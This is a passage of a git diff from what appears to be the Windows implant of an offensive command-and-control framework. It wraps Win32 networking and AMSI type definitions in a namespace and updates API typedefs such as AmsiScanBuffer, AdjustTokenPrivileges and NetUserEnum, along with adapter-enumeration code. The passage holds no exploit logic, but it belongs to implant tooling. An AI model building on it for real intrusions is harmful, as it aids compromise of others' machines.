diff --git a/payload/win/implant/include/core/procs.hpp b/payload/win/implant/include/core/procs.hpp index ae3d25f..b3b7a8a 100644 --- a/payload/win/implant/include/core/procs.hpp +++ b/payload/win/implant/include/core/procs.hpp @@ -305,7 +305,7 @@ namespace Procs // AdjustTokenPrivileges typedef BOOL (WINAPI* LPPROC_ADJUSTTOKENPRIVILEGES)(HANDLE TokenHandle, BOOL DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, DWORD BufferLength, PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength); // AmsiScanBuffer - typedef HRESULT (WINAPI* LPPROC_AMSISCANBUFFER)(HAMSICONTEXT amsiContext, PVOID buffer, ULONG length, LPCWSTR contentName, HAMSISESSION amsiSession, AMSI_RESULT *result); + typedef HRESULT (WINAPI* LPPROC_AMSISCANBUFFER)(Win32::HAMSICONTEXT amsiContext, PVOID buffer, ULONG length, LPCWSTR contentName, Win32::HAMSISESSION amsiSession, Win32::AMSI_RESULT *result); // BCryptCloseAlgorithmProvider typedef NTSTATUS (WINAPI* LPPROC_BCRYPTCLOSEALGORITHMPROVIDER)(BCRYPT_ALG_HANDLE hAlgorithm, ULONG dwFlags); // BCryptDecrypt @@ -367,7 +367,7 @@ namespace Procs // FreeLibrary typedef BOOL (WINAPI* LPPROC_FREELIBRARY)(HMODULE hLibModule); // GetAdaptersAddresses - typedef ULONG (WINAPI* LPPROC_GETADAPTERSADDRESSES)(ULONG Family, ULONG Flags, PVOID Reserved, PIP_ADAPTER_ADDRESSES AdapterAddresses, PULONG SizePointer); + typedef ULONG (WINAPI* LPPROC_GETADAPTERSADDRESSES)(ULONG Family, ULONG Flags, PVOID Reserved, Win32::PIP_ADAPTER_ADDRESSES AdapterAddresses, PULONG SizePointer); // GetComputerNameW typedef BOOL (WINAPI* LPPROC_GETCOMPUTERNAMEW)(LPWSTR lpBuffer, LPDWORD nSize); // GetEnvironmentStringsW @@ -397,7 +397,7 @@ namespace Procs // GetSystemTime typedef VOID (WINAPI* LPPROC_GETSYSTEMTIME)(LPSYSTEMTIME lpSystemTime); // GetTcpTable - typedef ULONG (WINAPI* LPPROC_GETTCPTABLE)(PMIB_TCPTABLE TcpTable, PULONG SizePointer, BOOL Order); + typedef ULONG (WINAPI* LPPROC_GETTCPTABLE)(Win32::PMIB_TCPTABLE TcpTable, PULONG SizePointer, BOOL Order); // GetTokenInformation typedef BOOL (WINAPI* LPPROC_GETTOKENINFORMATION)(HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength); // GetUserNameW @@ -441,11 +441,11 @@ namespace Procs // MoveFileW typedef BOOL (WINAPI* LPPROC_MOVEFILEW)(LPCWSTR lpExistingFileName, LPCWSTR lpNewFileName); // NetApiBufferFree - typedef NET_API_STATUS (WINAPI* LPPROC_NETAPIBUFFERFREE)(LPVOID Buffer); + typedef Win32::NET_API_STATUS (WINAPI* LPPROC_NETAPIBUFFERFREE)(LPVOID Buffer); // NetLocalGroupEnum - typedef NET_API_STATUS (WINAPI* LPPROC_NETLOCALGROUPENUM)(LPCWSTR servername, DWORD level, LPBYTE *bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, PDWORD_PTR resumehandle); + typedef Win32::NET_API_STATUS (WINAPI* LPPROC_NETLOCALGROUPENUM)(LPCWSTR servername, DWORD level, LPBYTE *bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, PDWORD_PTR resumehandle); // NetUserEnum - typedef NET_API_STATUS (WINAPI* LPPROC_NETUSERENUM)(LPCWSTR servername, DWORD level, DWORD filter, LPBYTE *bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, PDWORD resume_handle); + typedef Win32::NET_API_STATUS (WINAPI* LPPROC_NETUSERENUM)(LPCWSTR servername, DWORD level, DWORD filter, LPBYTE *bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, PDWORD resume_handle); // OpenProcess typedef HANDLE (WINAPI* LPPROC_OPENPROCESS)(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId); // OpenProcessToken diff --git a/payload/win/implant/include/core/win32.hpp b/payload/win/implant/include/core/win32.hpp index 1a5a79c..5522751 100644 --- a/payload/win/implant/include/core/win32.hpp +++ b/payload/win/implant/include/core/win32.hpp @@ -1,344 +1,349 @@ #ifndef HERMIT_CORE_WIN32_HPP #define HERMIT_CORE_WIN32_HPP -#define MAX_DNS_SUFFIX_STRING_LENGTH 256 -#define MAX_ADAPTER_ADDRESS_LENGTH 8 -#define MAX_DHCPV6_DUID_LENGTH 130 - -// ------------------------------------------------------------------ -// amsi.h -// ------------------------------------------------------------------ - -typedef HANDLE HAMSICONTEXT; -typedef HANDLE HAMSISESSION; - -typedef enum { - AMSI_RESULT_CLEAN, - AMSI_RESULT_NOT_DETECTED, - AMSI_RESULT_BLOCKED_BY_ADMIN_START, - AMSI_RESULT_BLOCKED_BY_ADMIN_END, - AMSI_RESULT_DETECTED -} AMSI_RESULT; - -// ------------------------------------------------------------------ -// ifdef.h -// ------------------------------------------------------------------ - -typedef DWORD NET_API_STATUS; -typedef ULONG NET_IFINDEX; -typedef NET_IFINDEX IF_INDEX; -typedef ULONG IFTYPE; -typedef UINT32 NET_IF_COMPARTMENT_ID; - -typedef enum { - IfOperStatusUp = 1, - IfOperStatusDown, - IfOperStatusTesting, - IfOperStatusUnknown, - IfOperStatusDormant, - IfOperStatusNotPresent, - IfOperStatusLowerLayerDown -} IF_OPER_STATUS; - -typedef enum _NET_IF_CONNECTION_TYPE { - NET_IF_CONNECTION_DEDICATED = 1, - NET_IF_CONNECTION_PASSIVE = 2, - NET_IF_CONNECTION_DEMAND = 3, - NET_IF_CONNECTION_MAXIMUM = 4 -} NET_IF_CONNECTION_TYPE, *PNET_IF_CONNECTION_TYPE; - -// ------------------------------------------------------------------ -// iphlpapi.h -// ------------------------------------------------------------------ - -#define GAA_FLAG_INCLUDE_PREFIX 0x0010 - -typedef union _NET_LUID_LH { - ULONG64 Value; - struct { - ULONG64 Reserved : 24; - ULONG64 NetLuidIndex : 24; - ULONG64 IfType : 16; - } Info; -} NET_LUID_LH, *PNET_LUID_LH; -typedef union _NET_LUID_LH NET_LUID_LH; -typedef NET_LUID_LH NET_LUID; -typedef NET_LUID IF_LUID; - -typedef enum { - IpPrefixOriginOther = 0, - IpPrefixOriginManual, - IpPrefixOriginWellKnown, - IpPrefixOriginDhcp, - IpPrefixOriginRouterAdvertisement -} IP_PREFIX_ORIGIN; - -typedef enum { - NlsoOther = 0, - NlsoManual, - NlsoWellKnown, - NlsoDhcp, - NlsoLinkLayerAddress, - NlsoRandom, - IpSuffixOriginOther = 0, - IpSuffixOriginManual, - IpSuffixOriginWellKnown, - IpSuffixOriginDhcp, - IpSuffixOriginLinkLayerAddress, - IpSuffixOriginRandom, - IpSuffixOriginUnchanged = 1 << 4 -} NL_SUFFIX_ORIGIN; - -typedef enum { - NldsInvalid, - NldsTentative, - NldsDuplicate, - NldsDeprecated, - NldsPreferred, - IpDadStateInvalid = 0, - IpDadStateTentative, - IpDadStateDuplicate, - IpDadStateDeprecated, - IpDadStatePreferred, -} NL_DAD_STATE; - -typedef enum { - TUNNEL_TYPE_NONE = 0, - TUNNEL_TYPE_OTHER = 1, - TUNNEL_TYPE_DIRECT = 2, - TUNNEL_TYPE_6TO4 = 11, - TUNNEL_TYPE_ISATAP = 13, - TUNNEL_TYPE_TEREDO = 14, - TUNNEL_TYPE_IPHTTPS = 15 -} TUNNEL_TYPE, *PTUNNEL_TYPE; - -typedef NL_SUFFIX_ORIGIN IP_SUFFIX_ORIGIN; -typedef NL_DAD_STATE IP_DAD_STATE; - -// typedef struct _GUID { -// unsigned long Data1; -// unsigned short Data2; -// unsigned short Data3; -// unsigned char Data4[8]; -// } GUID; - -typedef GUID NET_IF_NETWORK_GUID; - -typedef struct _MY_SOCKET_ADDRESS { - LPSOCKADDR lpSockaddr; - INT iSockaddrLength; -} MY_SOCKET_ADDRESS, *PMY_SOCKET_ADDRESS, *LPMY_SOCKET_ADDRESS; - -typedef struct _IP_ADAPTER_UNICAST_ADDRESS_LH { - union { - ULONGLONG Alignment; - struct { - ULONG Length; - DWORD Flags; - }; - }; - struct _IP_ADAPTER_UNICAST_ADDRESS_LH *Next; - MY_SOCKET_ADDRESS Address; - IP_PREFIX_ORIGIN PrefixOrigin; - IP_SUFFIX_ORIGIN SuffixOrigin; - IP_DAD_STATE DadState; - ULONG ValidLifetime; - ULONG PreferredLifetime; - ULONG LeaseLifetime; - UINT8 OnLinkPrefixLength; -} IP_ADAPTER_UNICAST_ADDRESS_LH, *PIP_ADAPTER_UNICAST_ADDRESS_LH; - -typedef IP_ADAPTER_UNICAST_ADDRESS_LH IP_ADAPTER_UNICAST_ADDRESS; -typedef IP_ADAPTER_UNICAST_ADDRESS_LH *PIP_ADAPTER_UNICAST_ADDRESS; - -typedef struct _IP_ADAPTER_ANYCAST_ADDRESS_XP { - union { - ULONGLONG Alignment; - struct { - ULONG Length; - DWORD Flags; +namespace Win32 +{ + + #define MAX_DNS_SUFFIX_STRING_LENGTH 256 + #define MAX_ADAPTER_ADDRESS_LENGTH 8 + #define MAX_DHCPV6_DUID_LENGTH 130 + + // ------------------------------------------------------------------ + // amsi.h + // ------------------------------------------------------------------ + + typedef HANDLE HAMSICONTEXT; + typedef HANDLE HAMSISESSION; + + typedef enum { + AMSI_RESULT_CLEAN, + AMSI_RESULT_NOT_DETECTED, + AMSI_RESULT_BLOCKED_BY_ADMIN_START, + AMSI_RESULT_BLOCKED_BY_ADMIN_END, + AMSI_RESULT_DETECTED + } AMSI_RESULT; + + // ------------------------------------------------------------------ + // ifdef.h + // ------------------------------------------------------------------ + + typedef DWORD NET_API_STATUS; + typedef ULONG NET_IFINDEX; + typedef NET_IFINDEX IF_INDEX; + typedef ULONG IFTYPE; + typedef UINT32 NET_IF_COMPARTMENT_ID; + + typedef enum { + IfOperStatusUp = 1, + IfOperStatusDown, + IfOperStatusTesting, + IfOperStatusUnknown, + IfOperStatusDormant, + IfOperStatusNotPresent, + IfOperStatusLowerLayerDown + } IF_OPER_STATUS; + + typedef enum _NET_IF_CONNECTION_TYPE { + NET_IF_CONNECTION_DEDICATED = 1, + NET_IF_CONNECTION_PASSIVE = 2, + NET_IF_CONNECTION_DEMAND = 3, + NET_IF_CONNECTION_MAXIMUM = 4 + } NET_IF_CONNECTION_TYPE, *PNET_IF_CONNECTION_TYPE; + + // ------------------------------------------------------------------ + // iphlpapi.h + // ------------------------------------------------------------------ + + #define GAA_FLAG_INCLUDE_PREFIX 0x0010 + + typedef union _NET_LUID_LH { + ULONG64 Value; + struct { + ULONG64 Reserved : 24; + ULONG64 NetLuidIndex : 24; + ULONG64 IfType : 16; + } Info; + } NET_LUID_LH, *PNET_LUID_LH; + typedef union _NET_LUID_LH NET_LUID_LH; + typedef NET_LUID_LH NET_LUID; + typedef NET_LUID IF_LUID; + + typedef enum { + IpPrefixOriginOther = 0, + IpPrefixOriginManual, + IpPrefixOriginWellKnown, + IpPrefixOriginDhcp, + IpPrefixOriginRouterAdvertisement + } IP_PREFIX_ORIGIN; + + typedef enum { + NlsoOther = 0, + NlsoManual, + NlsoWellKnown, + NlsoDhcp, + NlsoLinkLayerAddress, + NlsoRandom, + IpSuffixOriginOther = 0, + IpSuffixOriginManual, + IpSuffixOriginWellKnown, + IpSuffixOriginDhcp, + IpSuffixOriginLinkLayerAddress, + IpSuffixOriginRandom, + IpSuffixOriginUnchanged = 1 << 4 + } NL_SUFFIX_ORIGIN; + + typedef enum { + NldsInvalid, + NldsTentative, + NldsDuplicate, + NldsDeprecated, + NldsPreferred, + IpDadStateInvalid = 0, + IpDadStateTentative, + IpDadStateDuplicate, + IpDadStateDeprecated, + IpDadStatePreferred, + } NL_DAD_STATE; + + typedef enum { + TUNNEL_TYPE_NONE = 0, + TUNNEL_TYPE_OTHER = 1, + TUNNEL_TYPE_DIRECT = 2, + TUNNEL_TYPE_6TO4 = 11, + TUNNEL_TYPE_ISATAP = 13, + TUNNEL_TYPE_TEREDO = 14, + TUNNEL_TYPE_IPHTTPS = 15 + } TUNNEL_TYPE, *PTUNNEL_TYPE; + + typedef NL_SUFFIX_ORIGIN IP_SUFFIX_ORIGIN; + typedef NL_DAD_STATE IP_DAD_STATE; + + // typedef struct _GUID { + // unsigned long Data1; + // unsigned short Data2; + // unsigned short Data3; + // unsigned char Data4[8]; + // } GUID; + + typedef GUID NET_IF_NETWORK_GUID; + + typedef struct _MY_SOCKET_ADDRESS { + LPSOCKADDR lpSockaddr; + INT iSockaddrLength; + } MY_SOCKET_ADDRESS, *PMY_SOCKET_ADDRESS, *LPMY_SOCKET_ADDRESS; + + typedef struct _IP_ADAPTER_UNICAST_ADDRESS_LH { + union { + ULONGLONG Alignment; + struct { + ULONG Length; + DWORD Flags; + }; }; - }; - struct _IP_ADAPTER_ANYCAST_ADDRESS_XP *Next; - MY_SOCKET_ADDRESS Address; -} IP_ADAPTER_ANYCAST_ADDRESS_XP, *PIP_ADAPTER_ANYCAST_ADDRESS_XP; - -typedef IP_ADAPTER_ANYCAST_ADDRESS_XP IP_ADAPTER_ANYCAST_ADDRESS; -typedef IP_ADAPTER_ANYCAST_ADDRESS_XP *PIP_ADAPTER_ANYCAST_ADDRESS; - -typedef struct _IP_ADAPTER_MULTICAST_ADDRESS_XP { - union { - ULONGLONG Alignment; - struct { - ULONG Length; - DWORD Flags; + struct _IP_ADAPTER_UNICAST_ADDRESS_LH *Next; + MY_SOCKET_ADDRESS Address; + IP_PREFIX_ORIGIN PrefixOrigin; + IP_SUFFIX_ORIGIN SuffixOrigin; + IP_DAD_STATE DadState; + ULONG ValidLifetime; + ULONG PreferredLifetime; + ULONG LeaseLifetime; + UINT8 OnLinkPrefixLength; + } IP_ADAPTER_UNICAST_ADDRESS_LH, *PIP_ADAPTER_UNICAST_ADDRESS_LH; + + typedef IP_ADAPTER_UNICAST_ADDRESS_LH IP_ADAPTER_UNICAST_ADDRESS; + typedef IP_ADAPTER_UNICAST_ADDRESS_LH *PIP_ADAPTER_UNICAST_ADDRESS; + + typedef struct _IP_ADAPTER_ANYCAST_ADDRESS_XP { + union { + ULONGLONG Alignment; + struct { + ULONG Length; + DWORD Flags; + }; }; - }; - struct _IP_ADAPTER_MULTICAST_ADDRESS_XP *Next; - MY_SOCKET_ADDRESS Address; -} IP_ADAPTER_MULTICAST_ADDRESS_XP, *PIP_ADAPTER_MULTICAST_ADDRESS_XP; - -typedef IP_ADAPTER_MULTICAST_ADDRESS_XP IP_ADAPTER_MULTICAST_ADDRESS; -typedef IP_ADAPTER_MULTICAST_ADDRESS_XP *PIP_ADAPTER_MULTICAST_ADDRESS; - -typedef struct _IP_ADAPTER_DNS_SERVER_ADDRESS_XP { - union { - ULONGLONG Alignment; - struct { - ULONG Length; - DWORD Reserved; + struct _IP_ADAPTER_ANYCAST_ADDRESS_XP *Next; + MY_SOCKET_ADDRESS Address; + } IP_ADAPTER_ANYCAST_ADDRESS_XP, *PIP_ADAPTER_ANYCAST_ADDRESS_XP; + + typedef IP_ADAPTER_ANYCAST_ADDRESS_XP IP_ADAPTER_ANYCAST_ADDRESS; + typedef IP_ADAPTER_ANYCAST_ADDRESS_XP *PIP_ADAPTER_ANYCAST_ADDRESS; + + typedef struct _IP_ADAPTER_MULTICAST_ADDRESS_XP { + union { + ULONGLONG Alignment; + struct { + ULONG Length; + DWORD Flags; + }; }; - }; - struct _IP_ADAPTER_DNS_SERVER_ADDRESS_XP *Next; - MY_SOCKET_ADDRESS Address; -} IP_ADAPTER_DNS_SERVER_ADDRESS_XP, *PIP_ADAPTER_DNS_SERVER_ADDRESS_XP; - -typedef IP_ADAPTER_DNS_SERVER_ADDRESS_XP IP_ADAPTER_DNS_SERVER_ADDRESS; -typedef IP_ADAPTER_DNS_SERVER_ADDRESS_XP *PIP_ADAPTER_DNS_SERVER_ADDRESS; - -typedef struct _IP_ADAPTER_PREFIX_XP { - union { - ULONGLONG Alignment; - struct { - ULONG Length; - DWORD Flags; + struct _IP_ADAPTER_MULTICAST_ADDRESS_XP *Next; + MY_SOCKET_ADDRESS Address; + } IP_ADAPTER_MULTICAST_ADDRESS_XP, *PIP_ADAPTER_MULTICAST_ADDRESS_XP; + + typedef IP_ADAPTER_MULTICAST_ADDRESS_XP IP_ADAPTER_MULTICAST_ADDRESS; + typedef IP_ADAPTER_MULTICAST_ADDRESS_XP *PIP_ADAPTER_MULTICAST_ADDRESS; + + typedef struct _IP_ADAPTER_DNS_SERVER_ADDRESS_XP { + union { + ULONGLONG Alignment; + struct { + ULONG Length; + DWORD Reserved; + }; }; - }; - struct _IP_ADAPTER_PREFIX_XP *Next; - MY_SOCKET_ADDRESS Address; - ULONG PrefixLength; -} IP_ADAPTER_PREFIX_XP, *PIP_ADAPTER_PREFIX_XP; - -typedef IP_ADAPTER_PREFIX_XP IP_ADAPTER_PREFIX; -typedef IP_ADAPTER_PREFIX_XP *PIP_ADAPTER_PREFIX; - -typedef struct _IP_ADAPTER_WINS_SERVER_ADDRESS_LH { - union { - ULONGLONG Alignment; - struct { - ULONG Length; - DWORD Reserved; + struct _IP_ADAPTER_DNS_SERVER_ADDRESS_XP *Next; + MY_SOCKET_ADDRESS Address; + } IP_ADAPTER_DNS_SERVER_ADDRESS_XP, *PIP_ADAPTER_DNS_SERVER_ADDRESS_XP; + + typedef IP_ADAPTER_DNS_SERVER_ADDRESS_XP IP_ADAPTER_DNS_SERVER_ADDRESS; + typedef IP_ADAPTER_DNS_SERVER_ADDRESS_XP *PIP_ADAPTER_DNS_SERVER_ADDRESS; + + typedef struct _IP_ADAPTER_PREFIX_XP { + union { + ULONGLONG Alignment; + struct { + ULONG Length; + DWORD Flags; + }; }; - }; - struct _IP_ADAPTER_WINS_SERVER_ADDRESS_LH *Next; - MY_SOCKET_ADDRESS Address; -} IP_ADAPTER_WINS_SERVER_ADDRESS_LH, *PIP_ADAPTER_WINS_SERVER_ADDRESS_LH; - -typedef struct _IP_ADAPTER_GATEWAY_ADDRESS_LH { - union { - ULONGLONG Alignment; - struct { - ULONG Length; - DWORD Reserved; + struct _IP_ADAPTER_PREFIX_XP *Next; + MY_SOCKET_ADDRESS Address; + ULONG PrefixLength; + } IP_ADAPTER_PREFIX_XP, *PIP_ADAPTER_PREFIX_XP; + + typedef IP_ADAPTER_PREFIX_XP IP_ADAPTER_PREFIX; + typedef IP_ADAPTER_PREFIX_XP *PIP_ADAPTER_PREFIX; + + typedef struct _IP_ADAPTER_WINS_SERVER_ADDRESS_LH { + union { + ULONGLONG Alignment; + struct { + ULONG Length; + DWORD Reserved; + }; }; - }; - struct _IP_ADAPTER_GATEWAY_ADDRESS_LH *Next; - MY_SOCKET_ADDRESS Address; -} IP_ADAPTER_GATEWAY_ADDRESS_LH, *PIP_ADAPTER_GATEWAY_ADDRESS_LH; - -typedef struct _IP_ADAPTER_DNS_SUFFIX { - struct _IP_ADAPTER_DNS_SUFFIX *Next; - WCHAR String[MAX_DNS_SUFFIX_STRING_LENGTH]; -} IP_ADAPTER_DNS_SUFFIX, *PIP_ADAPTER_DNS_SUFFIX; - -typedef struct _IP_ADAPTER_ADDRESSES_LH { - union { - ULONGLONG Alignment; - struct { - ULONG Length; - IF_INDEX IfIndex; + struct _IP_ADAPTER_WINS_SERVER_ADDRESS_LH *Next; + MY_SOCKET_ADDRESS Address; + } IP_ADAPTER_WINS_SERVER_ADDRESS_LH, *PIP_ADAPTER_WINS_SERVER_ADDRESS_LH; + + typedef struct _IP_ADAPTER_GATEWAY_ADDRESS_LH { + union { + ULONGLONG Alignment; + struct { + ULONG Length; + DWORD Reserved; + }; }; - }; - struct _IP_ADAPTER_ADDRESSES_LH *Next; - PCHAR AdapterName; - PIP_ADAPTER_UNICAST_ADDRESS_LH FirstUnicastAddress; - PIP_ADAPTER_ANYCAST_ADDRESS_XP FirstAnycastAddress; - PIP_ADAPTER_MULTICAST_ADDRESS_XP FirstMulticastAddress; - PIP_ADAPTER_DNS_SERVER_ADDRESS_XP FirstDnsServerAddress; - PWCHAR DnsSuffix; - PWCHAR Description; - PWCHAR FriendlyName; - BYTE PhysicalAddress[MAX_ADAPTER_ADDRESS_LENGTH]; - ULONG PhysicalAddressLength; - union { - ULONG Flags; - struct { - ULONG DdnsEnabled : 1; - ULONG RegisterAdapterSuffix : 1; - ULONG Dhcpv4Enabled : 1; - ULONG ReceiveOnly : 1; - ULONG NoMulticast : 1; - ULONG Ipv6OtherStatefulConfig : 1; - ULONG NetbiosOverTcpipEnabled : 1; - ULONG Ipv4Enabled : 1; - ULONG Ipv6Enabled : 1; - ULONG Ipv6ManagedAddressConfigurationSupported : 1; + struct _IP_ADAPTER_GATEWAY_ADDRESS_LH *Next; + MY_SOCKET_ADDRESS Address; + } IP_ADAPTER_GATEWAY_ADDRESS_LH, *PIP_ADAPTER_GATEWAY_ADDRESS_LH; + + typedef struct _IP_ADAPTER_DNS_SUFFIX { + struct _IP_ADAPTER_DNS_SUFFIX *Next; + WCHAR String[MAX_DNS_SUFFIX_STRING_LENGTH]; + } IP_ADAPTER_DNS_SUFFIX, *PIP_ADAPTER_DNS_SUFFIX; + + typedef struct _IP_ADAPTER_ADDRESSES_LH { + union { + ULONGLONG Alignment; + struct { + ULONG Length; + IF_INDEX IfIndex; + }; }; - }; - ULONG Mtu; - IFTYPE IfType; - IF_OPER_STATUS OperStatus; - IF_INDEX Ipv6IfIndex; - ULONG ZoneIndices[16]; - PIP_ADAPTER_PREFIX_XP FirstPrefix; - ULONG64 TransmitLinkSpeed; - ULONG64 ReceiveLinkSpeed; - PIP_ADAPTER_WINS_SERVER_ADDRESS_LH FirstWinsServerAddress; - PIP_ADAPTER_GATEWAY_ADDRESS_LH FirstGatewayAddress; - ULONG Ipv4Metric; - ULONG Ipv6Metric; - IF_LUID Luid; - MY_SOCKET_ADDRESS Dhcpv4Server; - NET_IF_COMPARTMENT_ID CompartmentId; - NET_IF_NETWORK_GUID NetworkGuid; - NET_IF_CONNECTION_TYPE ConnectionType; - TUNNEL_TYPE TunnelType; - MY_SOCKET_ADDRESS Dhcpv6Server; - BYTE Dhcpv6ClientDuid[MAX_DHCPV6_DUID_LENGTH]; - ULONG Dhcpv6ClientDuidLength; - ULONG Dhcpv6Iaid; - PIP_ADAPTER_DNS_SUFFIX FirstDnsSuffix; -} IP_ADAPTER_ADDRESSES_LH, *PIP_ADAPTER_ADDRESSES_LH; - -typedef IP_ADAPTER_ADDRESSES_LH IP_ADAPTER_ADDRESSES; -typedef IP_ADAPTER_ADDRESSES_LH *PIP_ADAPTER_ADDRESSES; - -// ------------------------------------------------------------------ -// tcpmib.h -// ------------------------------------------------------------------ - -#define ANY_SIZE 1 - -typedef enum -{ - MIB_TCP_STATE_CLOSED = 1, - MIB_TCP_STATE_LISTEN = 2, - MIB_TCP_STATE_SYN_SENT = 3, - MIB_TCP_STATE_SYN_RCVD = 4, - MIB_TCP_STATE_ESTAB = 5, - MIB_TCP_STATE_FIN_WAIT1 = 6, - MIB_TCP_STATE_FIN_WAIT2 = 7, - MIB_TCP_STATE_CLOSE_WAIT = 8, - MIB_TCP_STATE_CLOSING = 9, - MIB_TCP_STATE_LAST_ACK = 10, - MIB_TCP_STATE_TIME_WAIT = 11, - MIB_TCP_STATE_DELETE_TCB = 12, -} MIB_TCP_STATE; - -typedef struct _MIB_TCPROW { + struct _IP_ADAPTER_ADDRESSES_LH *Next; + PCHAR AdapterName; + PIP_ADAPTER_UNICAST_ADDRESS_LH FirstUnicastAddress; + PIP_ADAPTER_ANYCAST_ADDRESS_XP FirstAnycastAddress; + PIP_ADAPTER_MULTICAST_ADDRESS_XP FirstMulticastAddress; + PIP_ADAPTER_DNS_SERVER_ADDRESS_XP FirstDnsServerAddress; + PWCHAR DnsSuffix; + PWCHAR Description; + PWCHAR FriendlyName; + BYTE PhysicalAddress[MAX_ADAPTER_ADDRESS_LENGTH]; + ULONG PhysicalAddressLength; union { - DWORD dwState; - MIB_TCP_STATE State; + ULONG Flags; + struct { + ULONG DdnsEnabled : 1; + ULONG RegisterAdapterSuffix : 1; + ULONG Dhcpv4Enabled : 1; + ULONG ReceiveOnly : 1; + ULONG NoMulticast : 1; + ULONG Ipv6OtherStatefulConfig : 1; + ULONG NetbiosOverTcpipEnabled : 1; + ULONG Ipv4Enabled : 1; + ULONG Ipv6Enabled : 1; + ULONG Ipv6ManagedAddressConfigurationSupported : 1; + }; }; - DWORD dwLocalAddr; - DWORD dwLocalPort; - DWORD dwRemoteAddr; - DWORD dwRemotePort; -} MIB_TCPROW, *PMIB_TCPROW; - -typedef struct _MIB_TCPTABLE { - DWORD dwNumEntries; - MIB_TCPROW table[ANY_SIZE]; -} MIB_TCPTABLE, *PMIB_TCPTABLE; + ULONG Mtu; + IFTYPE IfType; + IF_OPER_STATUS OperStatus; + IF_INDEX Ipv6IfIndex; + ULONG ZoneIndices[16]; + PIP_ADAPTER_PREFIX_XP FirstPrefix; + ULONG64 TransmitLinkSpeed; + ULONG64 ReceiveLinkSpeed; + PIP_ADAPTER_WINS_SERVER_ADDRESS_LH FirstWinsServerAddress; + PIP_ADAPTER_GATEWAY_ADDRESS_LH FirstGatewayAddress; + ULONG Ipv4Metric; + ULONG Ipv6Metric; + IF_LUID Luid; + MY_SOCKET_ADDRESS Dhcpv4Server; + NET_IF_COMPARTMENT_ID CompartmentId; + NET_IF_NETWORK_GUID NetworkGuid; + NET_IF_CONNECTION_TYPE ConnectionType; + TUNNEL_TYPE TunnelType; + MY_SOCKET_ADDRESS Dhcpv6Server; + BYTE Dhcpv6ClientDuid[MAX_DHCPV6_DUID_LENGTH]; + ULONG Dhcpv6ClientDuidLength; + ULONG Dhcpv6Iaid; + PIP_ADAPTER_DNS_SUFFIX FirstDnsSuffix; + } IP_ADAPTER_ADDRESSES_LH, *PIP_ADAPTER_ADDRESSES_LH; + + typedef IP_ADAPTER_ADDRESSES_LH IP_ADAPTER_ADDRESSES; + typedef IP_ADAPTER_ADDRESSES_LH *PIP_ADAPTER_ADDRESSES; + + // ------------------------------------------------------------------ + // tcpmib.h + // ------------------------------------------------------------------ + + #define ANY_SIZE 1 + + typedef enum + { + MIB_TCP_STATE_CLOSED = 1, + MIB_TCP_STATE_LISTEN = 2, + MIB_TCP_STATE_SYN_SENT = 3, + MIB_TCP_STATE_SYN_RCVD = 4, + MIB_TCP_STATE_ESTAB = 5, + MIB_TCP_STATE_FIN_WAIT1 = 6, + MIB_TCP_STATE_FIN_WAIT2 = 7, + MIB_TCP_STATE_CLOSE_WAIT = 8, + MIB_TCP_STATE_CLOSING = 9, + MIB_TCP_STATE_LAST_ACK = 10, + MIB_TCP_STATE_TIME_WAIT = 11, + MIB_TCP_STATE_DELETE_TCB = 12, + } MIB_TCP_STATE; + + typedef struct _MIB_TCPROW { + union { + DWORD dwState; + MIB_TCP_STATE State; + }; + DWORD dwLocalAddr; + DWORD dwLocalPort; + DWORD dwRemoteAddr; + DWORD dwRemotePort; + } MIB_TCPROW, *PMIB_TCPROW; + + typedef struct _MIB_TCPTABLE { + DWORD dwNumEntries; + MIB_TCPROW table[ANY_SIZE]; + } MIB_TCPTABLE, *PMIB_TCPTABLE; +} + #endif // HERMIT_CORE_WIN32_HPP diff --git a/payload/win/implant/src/core/task/ip.cpp b/payload/win/implant/src/core/task/ip.cpp index d10486c..7b08095 100644 --- a/payload/win/implant/src/core/task/ip.cpp +++ b/payload/win/implant/src/core/task/ip.cpp @@ -16,23 +16,23 @@ namespace Task // ULONG family = AF_INET6; LPVOID lpMsgBuf = NULL; - PIP_ADAPTER_ADDRESSES_LH pAddresses = NULL; + Win32::PIP_ADAPTER_ADDRESSES_LH pAddresses = NULL; ULONG outBufLen = 0; ULONG Iterations = 0; - PIP_ADAPTER_ADDRESSES_LH pCurrAddresses = NULL; - PIP_ADAPTER_UNICAST_ADDRESS pUnicast = NULL; - PIP_ADAPTER_ANYCAST_ADDRESS pAnycast = NULL; - PIP_ADAPTER_MULTICAST_ADDRESS pMulticast = NULL; - IP_ADAPTER_DNS_SERVER_ADDRESS* pDnsServer = NULL; - PIP_ADAPTER_GATEWAY_ADDRESS_LH pGateway = NULL; - IP_ADAPTER_PREFIX *pPrefix = NULL; + Win32::PIP_ADAPTER_ADDRESSES_LH pCurrAddresses = NULL; + Win32::PIP_ADAPTER_UNICAST_ADDRESS pUnicast = NULL; + Win32::PIP_ADAPTER_ANYCAST_ADDRESS pAnycast = NULL; + Win32::PIP_ADAPTER_MULTICAST_ADDRESS pMulticast = NULL; + Win32::IP_ADAPTER_DNS_SERVER_ADDRESS* pDnsServer = NULL; + Win32::PIP_ADAPTER_GATEWAY_ADDRESS_LH pGateway = NULL; + Win32::IP_ADAPTER_PREFIX *pPrefix = NULL; // Allocate a 15KB buffer to start with. outBufLen = WORKING_BUFFER_SIZE; do { - pAddresses = (IP_ADAPTER_ADDRESSES_LH*)MALLOC(outBufLen); + pAddresses = (Win32::IP_ADAPTER_ADDRESSES_LH*)MALLOC(outBufLen); if (pAddresses == NULL) { return L"Error: Could not allocate memory for addresses"; @@ -42,7 +42,7 @@ namespace Task family, flags, NULL, - (PIP_ADAPTER_ADDRESSES)pAddresses, + (Win32::PIP_ADAPTER_ADDRESSES)pAddresses, &outBufLen ); if (dwRetVal == ERROR_BUFFER_OVERFLOW) @@ -72,7 +72,7 @@ namespace Task // result += L"IfIndex (IPv4 Interface): " + ConvertDWORDToWstring(pCurrAddresses->IfIndex) + L"\n"; // result += L"Adapter Name: " + 